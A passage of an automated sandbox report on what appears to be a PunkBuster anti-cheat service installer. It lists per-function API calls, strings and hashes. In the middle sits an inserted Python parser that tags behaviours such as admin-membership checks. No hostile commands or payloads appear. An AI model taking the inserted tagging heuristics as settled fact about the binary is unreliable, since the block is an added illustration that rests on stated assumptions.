                                              • SetWindowLongA.USER32(00000000,000000EB), ref: 004381A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$Long$Create
                                              • String ID: BUTTON
                                              • API String ID: 1733017098-3405671355
                                              • Opcode ID: 6c3bf0fd82592f3ce33d0156255dc22ed68ef4fecfa262555431378655de1657
                                              • Instruction ID: 5eb1fe1e349d0c2bf26a2ea382cf1488185d3080d212b75d548425cf7d1e2c38
                                              • Opcode Fuzzy Hash: 6c3bf0fd82592f3ce33d0156255dc22ed68ef4fecfa262555431378655de1657
                                              • Instruction Fuzzy Hash: BD718CB1244301AFD314DF69DC81FABB7E9BB88710F10461EF55997391DB78A801CB69
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00409D9D
                                                • Part of subcall function 004092B5: __EH_prolog.LIBCMT ref: 004092BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$Installing$PunkBuster Service Setup v%d.%d %s - Step 2 of 2 - %s$PunkBuster Service Setup v%d.%d %s - Step 3 of 3 - %s$Un-installing
                                              • API String ID: 3519838083-4248269577
                                              • Opcode ID: 47b21bcafda829a2fb58cab40aa02b5fde0f793797ae0bb3dd78f86cf4abb4ca
                                              • Instruction ID: 78eb83f452c0a5ae38286d43f464178ba804fbe3ee9df3c1ff42f644fb56a5a3
                                              • Opcode Fuzzy Hash: 47b21bcafda829a2fb58cab40aa02b5fde0f793797ae0bb3dd78f86cf4abb4ca
                                              • Instruction Fuzzy Hash: A0719F70A002499FDB20DF64C894BEAB7F5AF49304F4440BEE149A72E3DB791E84CB59
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004930C2
                                              • __allrem.LIBCMT ref: 00493163
                                              • __allrem.LIBCMT ref: 00493211
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00493232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID: gfff
                                              • API String ID: 1992179935-1553575800
                                              • Opcode ID: 909063c54548ab0acba61d0d3cc2af11cb58f79ae02012acdd2ebfa6cf058626
                                              • Instruction ID: 8483a46b589cb985f3b50d97f83bcfce0800402eec219d4dcdb42ed114fc504e
                                              • Opcode Fuzzy Hash: 909063c54548ab0acba61d0d3cc2af11cb58f79ae02012acdd2ebfa6cf058626
                                              • Instruction Fuzzy Hash: BB71E5727143108BCB18CF19DC41A2BBBD6AFD5314F49893EF445CB3A1E678EA098796
                                              APIs
                                                • Part of subcall function 004076BA: __EH_prolog.LIBCMT ref: 004076BF
                                                • Part of subcall function 004076BA: GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 0040770C
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 00407786
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00402DE6
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00402DEE
                                              • GetLastError.KERNEL32 ref: 00402DF0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService_strncat$DirectoryErrorH_prologLastSystem
                                              • String ID: ERROR$Failed to start PnkBstrA service
                                              • API String ID: 2671922418-177627567
                                              • Opcode ID: ec03abff27e189f0570cde6ee349a6b5db4ab6f28ff478a2f9be88eaa58b738d
                                              • Instruction ID: 01776ab97a73c0c806ad562cde7058c9eb851f531a22512e06677a1d816b8581
                                              • Opcode Fuzzy Hash: ec03abff27e189f0570cde6ee349a6b5db4ab6f28ff478a2f9be88eaa58b738d
                                              • Instruction Fuzzy Hash: D0F090355007449FCB11AB61DC45CEA77B2FF88750F1044EDF14A9A1A0CB352A80CF05
                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040903F
                                              • GetProcAddress.KERNEL32(00000000), ref: 00409046
                                              • GetCurrentProcess.KERNEL32(00000000), ref: 00409059
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressCurrentHandleModuleProcProcess
                                              • String ID: IsWow64Process$kernel32
                                              • API String ID: 4190356694-3789238822
                                              • Opcode ID: 4d39c8669cf566aea2a0cfb047afcbf8134d52e3e86177dd4aa2fb2500acd86a
                                              • Instruction ID: b2889b05f1dad1e2f3c50c1bb822b6e8b82adfdb205b460a6e2e4a438975ea47
                                              • Opcode Fuzzy Hash: 4d39c8669cf566aea2a0cfb047afcbf8134d52e3e86177dd4aa2fb2500acd86a
                                              • Instruction Fuzzy Hash: 99E04F74941348EBEB40DFB1DC4DB8977ACEB04706F200065B501E25A1D7789A448B18
                                              APIs
                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,004BD355,?), ref: 004C5CDD
                                              • InterlockedExchange.KERNEL32(006E5828,00000001), ref: 004C5D5B
                                              • InterlockedExchange.KERNEL32(006E5828,00000000), ref: 004C5DC0
                                              • InterlockedExchange.KERNEL32(006E5828,00000001), ref: 004C5DE4
                                              • InterlockedExchange.KERNEL32(006E5828,00000000), ref: 004C5E44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlocked$QueryVirtual
                                              • String ID:
                                              • API String ID: 2947987494-0
                                              • Opcode ID: 0997a2d5fa3fa2299e1212705d19e1cf62f61f8327e0e6827bbd249c09d78027
                                              • Instruction ID: d4fd967b9ef2ddb5f493da4d0830cd1fabe8dda03b298e9488f7d68cad15bcae
                                              • Opcode Fuzzy Hash: 0997a2d5fa3fa2299e1212705d19e1cf62f61f8327e0e6827bbd249c09d78027
                                              • Instruction Fuzzy Hash: C951C238A00F518FDFA48B58D8C4F6E73A5EB41714F64812FD4129B2A5D778F9C28A48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb2e1ef7f134cbd150f3a8f1cad5c3c71ba5ec4d18e13d1a1c7ae3d541101f7a
                                              • Instruction ID: 06e022bca2f044a232651a0051462ae43df652e2cdae1c6bcfd5a88350d1bcd9
                                              • Opcode Fuzzy Hash: bb2e1ef7f134cbd150f3a8f1cad5c3c71ba5ec4d18e13d1a1c7ae3d541101f7a
                                              • Instruction Fuzzy Hash: BD41B1B5C00265AACF20BF769C84AEF7A64EB41728710413FF919A62A1D73C4D458BBD
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040D2BD
                                                • Part of subcall function 0040906B: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,0040D2D4,64-bit,00000000), ref: 004090A6
                                                • Part of subcall function 0040906B: CheckTokenMembership.ADVAPI32(00000000,?,0040D2D4,?,0040D2D4,64-bit,00000000,00000000), ref: 004090BB
                                                • Part of subcall function 0040906B: FreeSid.ADVAPI32(?,?,0040D2D4,64-bit,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004090CB
                                              Strings
                                              • Message, xrefs: 0040D2E5
                                              • 64-bit, xrefs: 0040D2C9
                                              • **ERROR: Since this program needs to install a system service, it must be run as Administrator. If you need assistance with this, please visit our FAQ page at: http://www.evenbalance.com/index.php?page=pbsvcfaq.php, xrefs: 0040D2F2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateCheckFreeH_prologInitializeMembershipToken
                                              • String ID: **ERROR: Since this program needs to install a system service, it must be run as Administrator. If you need assistance with this, please visit our FAQ page at: http://www.evenbalance.com/index.php?page=pbsvcfaq.php$64-bit$Message
                                              • API String ID: 823383314-662163179
                                              • Opcode ID: d7a69150156cd50d1c04ccd039bb8ec0c02a260cf596ffd9b276cb661914f2ea
                                              • Instruction ID: 480cf2e0fd4845596181bfe692aa14e385947aba559717c7c60188e3466bd68c
                                              • Opcode Fuzzy Hash: d7a69150156cd50d1c04ccd039bb8ec0c02a260cf596ffd9b276cb661914f2ea
                                              • Instruction Fuzzy Hash: 6EC16D70A00245DFDB10DFA4C888BEEBBE1AF49304F5444BEE84AAB3D2CB795945CB55
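The two blocks above (the function at 0040903F that resolves IsWow64Process through GetModuleHandleA/GetProcAddress, and the function at 0040D2BD whose subcall 0040906B builds a SID with sub-authorities 0x20 and 0x220 and tests it with CheckTokenMembership before printing the "must be run as Administrator" message) are typical of what an analyst pulls out of this kind of report by hand. The following is an added example, not part of Joe Sandbox or of the analysed sample: a small parser for the plain-text layout used on this page that turns each function block into API, string and similarity records and tags the two behaviours just described. It assumes the "APIs / Strings / Similarity" headers and the bullet layout shown here, its tag names are hypothetical, and because the report shows the identifier-authority argument of AllocateAndInitializeSid only as a pointer (`?`), the value 5 (SECURITY_NT_AUTHORITY) is an assumption, chosen because 0x20 is SECURITY_BUILTIN_DOMAIN_RID and 0x220 is DOMAIN_ALIAS_RID_ADMINS, which together give BUILTIN\Administrators, S-1-5-32-544. The embedded sample text is constructed from lines of this report.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: two function blocks copied in the plain-text layout used
# by the report ("APIs" / "Strings" / "Similarity" headers, bullet entries).
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040903F
• GetProcAddress.KERNEL32(00000000), ref: 00409046
• GetCurrentProcess.KERNEL32(00000000), ref: 00409059
Similarity
• API ID: AddressCurrentHandleModuleProcProcess
• String ID: IsWow64Process$kernel32
• Instruction Fuzzy Hash: 99E04F74941348EBEB40DFB1DC4DB8977ACEB04706F200065B501E25A1D7789A448B18
APIs
• __EH_prolog.LIBCMT ref: 0040D2BD
  • Part of subcall function 0040906B: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,0040D2D4,64-bit,00000000), ref: 004090A6
  • Part of subcall function 0040906B: CheckTokenMembership.ADVAPI32(00000000,?,0040D2D4,?,0040D2D4,64-bit,00000000,00000000), ref: 004090BB
  • Part of subcall function 0040906B: FreeSid.ADVAPI32(?,?,0040D2D4,64-bit,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004090CB
Strings
• Message, xrefs: 0040D2E5
• 64-bit, xrefs: 0040D2C9
• **ERROR: Since this program needs to install a system service, it must be run as Administrator. If you need assistance with this, please visit our FAQ page at: http://www.evenbalance.com/index.php?page=pbsvcfaq.php, xrefs: 0040D2F2
Similarity
• API ID: AllocateCheckFreeH_prologInitializeMembershipToken
• Instruction Fuzzy Hash: 6EC16D70A00245DFDB10DFA4C888BEEBBE1AF49304F5444BEE84AAB3D2CB795945CB55
"""

# One "APIs" entry: optional subcall prefix, Name.MODULE, optional (args), ref: address.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Similarity")


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)     # dicts: api, module, args, ref, caller
    strings: list = field(default_factory=list)  # (text, xref) tuples
    meta: dict = field(default_factory=dict)     # "API ID", "String ID", hashes, ...


def parse_blocks(text):
    """Split report text into FunctionBlocks; a block ends at its Instruction Fuzzy Hash line."""
    blocks, cur, section = [], FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if line.startswith("• Instruction Fuzzy Hash:"):
            cur.meta["Instruction Fuzzy Hash"] = line.split(":", 1)[1].strip()
            blocks.append(cur)
            cur, section = FunctionBlock(), None
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                entry = m.groupdict()
                entry["args"] = [a.strip() for a in entry["args"].split(",")] if entry["args"] else []
                cur.apis.append(entry)
        elif section == "Strings" and ", xrefs: " in line:
            text_, xref = line[2:].rsplit(", xrefs: ", 1)  # string bodies may contain commas
            cur.strings.append((text_, xref))
        elif section == "Similarity" and line.startswith("• ") and ":" in line:
            key, _, val = line[2:].partition(":")
            cur.meta[key.strip()] = val.strip()
    if cur.apis or cur.strings:
        blocks.append(cur)
    return blocks


def sid_from_allocate_args(args, identifier_authority=5):
    """Rebuild the SID that AllocateAndInitializeSid constructs from its argument list:
    args[1] is nSubAuthorityCount and args[2:] the sub-authority slots. The identifier
    authority is passed by pointer ("?" in the report), so it is an ASSUMPTION here;
    5 (SECURITY_NT_AUTHORITY) is assumed because 0x20/0x220 are the BUILTIN domain
    and Administrators alias RIDs, which together give S-1-5-32-544."""
    count = int(args[1], 16)
    subs = [int(a, 16) for a in args[2:2 + count]]
    return "S-1-%d-%s" % (identifier_authority, "-".join(str(s) for s in subs))


def classify(block):
    """Tag a block with the behaviours its API sequence implies (tag names are hypothetical)."""
    names = [a["api"] for a in block.apis]
    tags = set()
    # Runtime API resolution: a module handle is obtained, then GetProcAddress follows it.
    loaders = [i for i, n in enumerate(names) if n.startswith(("GetModuleHandle", "LoadLibrary"))]
    if loaders and "GetProcAddress" in names[loaders[0]:]:
        tags.add("dynamic-api-resolution")
    if any("IsWow64Process" in a["args"] for a in block.apis):
        tags.add("wow64-check")
    # Admin check: build BUILTIN\Administrators and test the caller's token against it.
    for a in block.apis:
        if (a["api"] == "AllocateAndInitializeSid" and "CheckTokenMembership" in names
                and len(a["args"]) > 3 and sid_from_allocate_args(a["args"]) == "S-1-5-32-544"):
            tags.add("admin-membership-check")
    return tags


def triage(text):
    """Return [(API ID, sorted tags, string xrefs)] for every block in the text."""
    return [(b.meta.get("API ID", ""), sorted(classify(b)), [x for _, x in b.strings])
            for b in parse_blocks(text)]


if __name__ == "__main__":
    for api_id, tags, xrefs in triage(SAMPLE):
        print(api_id, tags, xrefs)
```

Run over the whole function-analysis text of a report, `triage` gives one line per function with the behaviour tags and the addresses that reference its strings, which is enough to jump straight to the admin check at 0040906B or the WOW64 probe at 0040903F in a disassembler. The parser deliberately keys on the `ref:` address rather than on argument values, since most arguments in these listings are unresolved (`?`) or stack residue.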
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004070D2
                                                • Part of subcall function 00406A55: __EH_prolog.LIBCMT ref: 00406A5A
                                                • Part of subcall function 0040A632: __EH_prolog.LIBCMT ref: 0040A637
                                              Strings
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 3, xrefs: 004071A4
                                              • frame, xrefs: 004070E6
                                              • Battlefield Bad Company 2, xrefs: 00407193
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 3$frame
                                              • API String ID: 3519838083-515625952
                                              • Opcode ID: cdc1f6182bd214d9045f9556bf90022187fa22f43cd70c14b82050586f43efeb
                                              • Instruction ID: b6a62f28c7b3057c80a3f56269876836a777f19cbbca4682d8e1b937b331a87d
                                              • Opcode Fuzzy Hash: cdc1f6182bd214d9045f9556bf90022187fa22f43cd70c14b82050586f43efeb
                                              • Instruction Fuzzy Hash: 1C31B670900288DFCB01DF64CC50BDEBBB4AF15304F1084BFE559A3291DB785A44CB69
                                              APIs
                                              Strings
                                              • PunkBuster Service Setup v%d.%d %s- Step 1 of 3, xrefs: 004097C2
                                              • Battlefield Bad Company 2, xrefs: 004097AC
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 2, xrefs: 004097C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 2$PunkBuster Service Setup v%d.%d %s- Step 1 of 3
                                              • API String ID: 3519838083-2774316313
                                              • Opcode ID: 3eed306f2d1d9ac54f449b40445fcb4ccd03e3b679d1554b8b83fbbae08ab14b
                                              • Instruction ID: a3b6ba2b4f641e5437b8940605f5d530bd99bbe82a93198287cab800592f0113
                                              • Opcode Fuzzy Hash: 3eed306f2d1d9ac54f449b40445fcb4ccd03e3b679d1554b8b83fbbae08ab14b
                                              • Instruction Fuzzy Hash: 48118EB0900208DFC700EB54C885FE973B4BB14704F0081BEA605A72E2DB785A85CB59
                                              APIs
                                              • GetLastError.KERNEL32(?,00000000,004BF718,004C27EB,00000000,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C,004BD4BE), ref: 004C318E
                                              • SetLastError.KERNEL32(00000000,?,?,?,0048B8FF,?,?,?,?,?,00401022,?,00000000), ref: 004C31F2
                                                • Part of subcall function 004BDC28: __lock.LIBCMT ref: 004BDC6C
                                                • Part of subcall function 004BDC28: RtlAllocateHeap.KERNEL32(00000008,?,0050EEB0,00000010,004C31B4,00000001,0000008C,?,?,?,0048B8FF,?), ref: 004BDCAA
                                              • GetCurrentThreadId.KERNEL32 ref: 004C31DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$AllocateCurrentHeapThread__lock
                                              • String ID: pl
                                              • API String ID: 523559038-1786839575
                                              • Opcode ID: cb88780e55af28360521e8d65bb42ce1b6262d24d1d92811166b2b08986586a4
                                              • Instruction ID: 4e15fead1da765310891571215d60c9e77c149a2e6dfa2c0e8c96e45c1ec75c6
                                              • Opcode Fuzzy Hash: cb88780e55af28360521e8d65bb42ce1b6262d24d1d92811166b2b08986586a4
                                              • Instruction Fuzzy Hash: 38F0C835601751DFEB201F70AC49F563AA5EF04762B04462EF8429A2B1DF7989408B94
                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00511168,00000010,004C27DA,00000000,00000FA0,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C), ref: 004CA454
                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 004CA464
                                              Strings
                                              • kernel32.dll, xrefs: 004CA44F
                                              • InitializeCriticalSectionAndSpinCount, xrefs: 004CA45E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                              • API String ID: 1646373207-3733552308
                                              • Opcode ID: 73cf7e5df0098c1c7d62d08b5aa5e6f9ae56e660d87144e9d257d9a9c70f2567
                                              • Instruction ID: e39fc0700cef1ff0848360b4e5987c70e5a34b69ece04a98e9f0bb628ab4d806
                                              • Opcode Fuzzy Hash: 73cf7e5df0098c1c7d62d08b5aa5e6f9ae56e660d87144e9d257d9a9c70f2567
                                              • Instruction Fuzzy Hash: 96F02438540789ABDB049FA4EC49B8D3AA1BB0070CB40826AE812D91A0E7B88590CB1E
                                              APIs
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 004C100B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: f1aec3b431f16c29a1ae30a5e188e7390e467b4d3a74b67c9d504762f04221b2
                                              • Instruction ID: 37db7b8bce4b1befea4292eedc19632542016c0b127df2ad6a9c700e1150dc0e
                                              • Opcode Fuzzy Hash: f1aec3b431f16c29a1ae30a5e188e7390e467b4d3a74b67c9d504762f04221b2
                                              • Instruction Fuzzy Hash: 35514C75900288CFDB72DFAACC80BEDBBB8AF46304F10415EE8559B262D7745A41CF15
                                              APIs
                                              • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 0041A487
                                              • GetWindowLongA.USER32(?,000000EB), ref: 0041A494
                                              • GetWindow.USER32(?,00000004), ref: 0041A4C7
